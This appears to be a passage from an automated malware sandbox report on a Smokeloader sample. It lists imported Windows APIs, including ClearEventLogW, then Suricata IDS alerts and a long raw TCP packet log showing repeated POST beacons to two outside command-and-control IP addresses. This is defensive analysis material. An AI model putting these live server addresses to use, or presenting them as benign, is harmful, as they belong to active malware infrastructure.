GetNumaProcessorNode, GetConsoleAliasExesLengthA, WriteConsoleOutputCharacterA, DeleteVolumeMountPointA, OpenJobObjectA, InterlockedDecrement, InterlockedCompareExchange, GetComputerNameW, SetEvent, FreeEnvironmentStringsA, GetModuleHandleW, ReadConsoleW, SetCommState, GetConsoleMode, ReadConsoleOutputW, GetSystemTimeAdjustment, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, GetBinaryTypeA, GetConsoleAliasesLengthW, DisconnectNamedPipe, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, SearchPathA, LoadLibraryA, LocalAlloc, SetCalendarInfoW, WritePrivateProfileStringA, QueryDosDeviceW, GetModuleFileNameA, GetDefaultCommConfigA, GetModuleHandleA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, FindAtomW, GlobalReAlloc, PulseEvent, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW

ADVAPI32.dll

ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-11T06:37:27.331919+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50549	116.58.10.60	80	TCP
2024-10-11T06:37:28.608795+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50550	116.58.10.60	80	TCP
2024-10-11T06:37:29.867486+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50551	116.58.10.60	80	TCP
2024-10-11T06:37:31.120563+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50552	116.58.10.60	80	TCP
2024-10-11T06:37:32.627921+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50553	116.58.10.60	80	TCP
2024-10-11T06:37:33.887842+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50554	116.58.10.60	80	TCP
2024-10-11T06:37:35.170910+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50555	116.58.10.60	80	TCP
2024-10-11T06:37:36.456953+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50556	116.58.10.60	80	TCP
2024-10-11T06:37:37.720039+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50557	116.58.10.60	80	TCP
2024-10-11T06:37:39.029454+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50558	116.58.10.60	80	TCP
2024-10-11T06:37:40.279368+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50559	116.58.10.60	80	TCP
2024-10-11T06:37:41.538479+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50560	116.58.10.60	80	TCP
2024-10-11T06:37:42.807815+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50561	116.58.10.60	80	TCP
2024-10-11T06:37:44.079413+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50562	116.58.10.60	80	TCP
2024-10-11T06:37:45.349627+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50563	116.58.10.60	80	TCP
2024-10-11T06:37:46.644516+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50564	116.58.10.60	80	TCP
2024-10-11T06:37:47.887306+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50565	116.58.10.60	80	TCP
2024-10-11T06:37:49.178180+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50566	116.58.10.60	80	TCP
2024-10-11T06:37:50.445145+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50567	116.58.10.60	80	TCP
2024-10-11T06:37:51.737702+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50568	116.58.10.60	80	TCP
2024-10-11T06:37:53.006273+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50569	116.58.10.60	80	TCP
2024-10-11T06:37:54.248895+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50570	116.58.10.60	80	TCP
2024-10-11T06:37:55.768968+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50571	116.58.10.60	80	TCP
2024-10-11T06:37:57.008913+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50573	116.58.10.60	80	TCP
2024-10-11T06:38:00.041549+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50581	116.58.10.60	80	TCP
2024-10-11T06:38:01.304385+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50592	116.58.10.60	80	TCP
2024-10-11T06:38:02.605345+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50598	116.58.10.60	80	TCP
2024-10-11T06:38:03.860532+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50609	116.58.10.60	80	TCP
2024-10-11T06:38:05.389156+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50615	116.58.10.60	80	TCP
2024-10-11T06:38:06.633083+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50626	116.58.10.60	80	TCP
2024-10-11T06:38:07.949302+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50636	116.58.10.60	80	TCP
2024-10-11T06:38:09.233415+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50643	116.58.10.60	80	TCP
2024-10-11T06:38:10.505968+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50654	116.58.10.60	80	TCP
2024-10-11T06:38:12.057886+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50664	116.58.10.60	80	TCP
2024-10-11T06:39:21.577978+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50850	116.58.10.60	80	TCP
2024-10-11T06:39:28.718450+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50851	116.58.10.60	80	TCP
2024-10-11T06:39:36.316985+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50852	116.58.10.60	80	TCP
2024-10-11T06:39:44.999341+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50853	116.58.10.60	80	TCP
2024-10-11T06:39:55.431116+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50854	116.58.10.60	80	TCP
2024-10-11T06:40:08.776918+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50855	186.233.231.45	80	TCP
2024-10-11T06:40:21.583692+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50856	186.233.231.45	80	TCP
2024-10-11T06:40:33.594959+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50857	186.233.231.45	80	TCP
2024-10-11T06:40:47.322863+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50858	186.233.231.45	80	TCP
2024-10-11T06:40:59.977004+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50859	186.233.231.45	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2024 06:37:26.081717014 CEST	50549	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:26.086863041 CEST	80	50549	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:26.086942911 CEST	50549	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:26.087119102 CEST	50549	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:26.087151051 CEST	50549	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:26.092567921 CEST	80	50549	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:26.092611074 CEST	80	50549	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:27.330255032 CEST	80	50549	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:27.331744909 CEST	80	50549	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:27.331918955 CEST	50549	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:27.332235098 CEST	50549	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:27.334234953 CEST	50550	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:27.337049961 CEST	80	50549	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:27.339276075 CEST	80	50550	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:27.339363098 CEST	50550	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:27.339456081 CEST	50550	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:27.339489937 CEST	50550	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:27.344615936 CEST	80	50550	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:27.344657898 CEST	80	50550	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:28.608561039 CEST	80	50550	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:28.608612061 CEST	80	50550	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:28.608794928 CEST	50550	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:28.608794928 CEST	50550	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:28.612421989 CEST	50551	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:28.613822937 CEST	80	50550	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:28.617471933 CEST	80	50551	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:28.617573023 CEST	50551	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:28.617679119 CEST	50551	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:28.617714882 CEST	50551	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:28.622570992 CEST	80	50551	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:28.622927904 CEST	80	50551	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:29.865607023 CEST	80	50551	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:29.867275000 CEST	80	50551	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:29.867486000 CEST	50551	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:29.867486000 CEST	50551	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:29.870002031 CEST	50552	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:29.872828960 CEST	80	50551	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:29.875000000 CEST	80	50552	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:29.875077009 CEST	50552	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:29.875168085 CEST	50552	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:29.875199080 CEST	50552	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:29.880547047 CEST	80	50552	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:29.880640984 CEST	80	50552	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:31.120218039 CEST	80	50552	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:31.120273113 CEST	80	50552	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:31.120563030 CEST	50552	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:31.120563030 CEST	50552	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:31.123079062 CEST	50553	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:31.125916004 CEST	80	50552	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:31.128498077 CEST	80	50553	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:31.128591061 CEST	50553	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:31.128701925 CEST	50553	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:31.128739119 CEST	50553	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:31.134287119 CEST	80	50553	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:31.134329081 CEST	80	50553	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:32.624485970 CEST	80	50553	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:32.627692938 CEST	80	50553	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:32.627921104 CEST	50553	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:32.627921104 CEST	50553	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:32.630134106 CEST	50554	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:32.633426905 CEST	80	50553	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:32.636445999 CEST	80	50554	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:32.636529922 CEST	50554	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:32.636657000 CEST	50554	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:32.636657000 CEST	50554	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:32.641808033 CEST	80	50554	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:32.642153025 CEST	80	50554	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:33.887737036 CEST	80	50554	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:33.887782097 CEST	80	50554	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:33.887841940 CEST	50554	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:33.887970924 CEST	50554	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:33.890561104 CEST	50555	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:33.893017054 CEST	80	50554	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:33.895683050 CEST	80	50555	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:33.895770073 CEST	50555	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:33.895883083 CEST	50555	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:33.895915985 CEST	50555	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:33.901082039 CEST	80	50555	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:33.901114941 CEST	80	50555	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:35.170355082 CEST	80	50555	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:35.170711994 CEST	80	50555	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:35.170909882 CEST	50555	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:35.170909882 CEST	50555	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:35.173182011 CEST	50556	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:35.176320076 CEST	80	50555	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:35.178235054 CEST	80	50556	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:35.178427935 CEST	50556	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:35.178427935 CEST	50556	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:35.178427935 CEST	50556	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:35.183593035 CEST	80	50556	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:35.183624029 CEST	80	50556	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:36.455070019 CEST	80	50556	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:36.456767082 CEST	80	50556	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:36.456953049 CEST	50556	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:36.460535049 CEST	50556	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:36.463156939 CEST	50557	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:36.465570927 CEST	80	50556	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:36.468832970 CEST	80	50557	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:36.468909979 CEST	50557	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:36.468993902 CEST	50557	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:36.469016075 CEST	50557	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:36.474083900 CEST	80	50557	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:36.474229097 CEST	80	50557	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:37.717370033 CEST	80	50557	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:37.719969988 CEST	80	50557	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:37.720038891 CEST	50557	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:37.720118046 CEST	50557	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:37.723428965 CEST	50558	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:37.728812933 CEST	80	50557	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:37.729955912 CEST	80	50558	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:37.730027914 CEST	50558	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:37.730607986 CEST	50558	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:37.730640888 CEST	50558	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:37.739473104 CEST	80	50558	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:37.739502907 CEST	80	50558	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:39.029239893 CEST	80	50558	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:39.029393911 CEST	80	50558	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:39.029453993 CEST	50558	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:39.029516935 CEST	50558	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:39.031717062 CEST	50559	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:39.034579992 CEST	80	50558	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:39.037427902 CEST	80	50559	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:39.037514925 CEST	50559	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:39.037609100 CEST	50559	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:39.037609100 CEST	50559	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:39.043533087 CEST	80	50559	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:39.044944048 CEST	80	50559	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:40.278882980 CEST	80	50559	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:40.279181004 CEST	80	50559	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:40.279367924 CEST	50559	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:40.279367924 CEST	50559	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:40.281594992 CEST	50560	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:40.284651041 CEST	80	50559	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:40.286571980 CEST	80	50560	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:40.286645889 CEST	50560	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:40.286746979 CEST	50560	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:40.286782026 CEST	50560	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:40.291980982 CEST	80	50560	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:40.292011023 CEST	80	50560	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:41.537832975 CEST	80	50560	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:41.538381100 CEST	80	50560	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:41.538479090 CEST	50560	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:41.538564920 CEST	50560	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:41.541181087 CEST	50561	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:41.543693066 CEST	80	50560	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:41.546444893 CEST	80	50561	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:41.546533108 CEST	50561	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:41.546612978 CEST	50561	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:41.546637058 CEST	50561	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:41.552011967 CEST	80	50561	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:41.552047968 CEST	80	50561	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:42.807575941 CEST	80	50561	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:42.807631016 CEST	80	50561	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:42.807815075 CEST	50561	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:42.807815075 CEST	50561	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:42.809907913 CEST	50562	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:42.813254118 CEST	80	50561	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:42.815563917 CEST	80	50562	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:42.815745115 CEST	50562	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:42.815881014 CEST	50562	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:42.815903902 CEST	50562	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:42.821078062 CEST	80	50562	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:42.821141958 CEST	80	50562	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:44.078490973 CEST	80	50562	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:44.079078913 CEST	80	50562	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:44.079412937 CEST	50562	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:44.079412937 CEST	50562	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:44.081552982 CEST	50563	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:44.084666967 CEST	80	50562	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:44.086780071 CEST	80	50563	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:44.086987019 CEST	50563	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:44.086987019 CEST	50563	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:44.087074041 CEST	50563	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:44.092348099 CEST	80	50563	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:44.092389107 CEST	80	50563	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:45.348758936 CEST	80	50563	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:45.349478960 CEST	80	50563	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:45.349627018 CEST	50563	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:45.353554964 CEST	50563	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:45.355993986 CEST	50564	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:45.358673096 CEST	80	50563	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:45.361705065 CEST	80	50564	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:45.361788034 CEST	50564	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:45.361881971 CEST	50564	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:45.361901045 CEST	50564	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:45.367893934 CEST	80	50564	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:45.367937088 CEST	80	50564	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:46.644383907 CEST	80	50564	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:46.644439936 CEST	80	50564	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:46.644515991 CEST	50564	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:46.644812107 CEST	50564	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:46.646644115 CEST	50565	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:46.649986982 CEST	80	50564	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:46.651658058 CEST	80	50565	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:46.651727915 CEST	50565	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:46.651829004 CEST	50565	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:46.651843071 CEST	50565	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:46.657130957 CEST	80	50565	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:46.657162905 CEST	80	50565	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:47.887083054 CEST	80	50565	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:47.887192011 CEST	80	50565	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:47.887305975 CEST	50565	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:47.887305975 CEST	50565	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:47.890137911 CEST	50566	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:47.892239094 CEST	80	50565	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:47.895216942 CEST	80	50566	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:47.895406008 CEST	50566	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:47.895406008 CEST	50566	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:47.895428896 CEST	50566	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:47.900620937 CEST	80	50566	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:47.900661945 CEST	80	50566	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:49.175060987 CEST	80	50566	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:49.178014994 CEST	80	50566	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:49.178179979 CEST	50566	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:49.178179979 CEST	50566	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:49.180373907 CEST	50567	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:49.183901072 CEST	80	50566	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:49.185405970 CEST	80	50567	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:49.185585976 CEST	50567	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:49.185616016 CEST	50567	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:49.185630083 CEST	50567	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:49.190996885 CEST	80	50567	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:49.191082954 CEST	80	50567	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:50.444509983 CEST	80	50567	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:50.445071936 CEST	80	50567	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:50.445144892 CEST	50567	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:50.445283890 CEST	50567	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:50.450328112 CEST	80	50567	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:50.452339888 CEST	50568	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:50.457427979 CEST	80	50568	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:50.457551956 CEST	50568	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:50.457628965 CEST	50568	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:50.457668066 CEST	50568	80	192.168.2.4	116.58.10.60
Oct 11, 2024 06:37:50.462704897 CEST	80	50568	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:50.462735891 CEST	80	50568	116.58.10.60	192.168.2.4
Oct 11, 2024 06:37:51.736558914 CEST	80	50568	116.58.10.60	192.168.2.4
